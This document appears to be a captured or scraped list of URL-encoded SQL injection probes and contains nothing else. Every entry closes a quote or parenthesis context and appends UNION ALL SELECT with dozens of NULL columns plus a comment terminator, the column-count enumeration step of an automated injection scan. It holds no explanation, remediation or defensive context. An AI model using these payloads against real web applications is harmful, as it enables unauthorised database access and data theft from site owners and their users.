1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 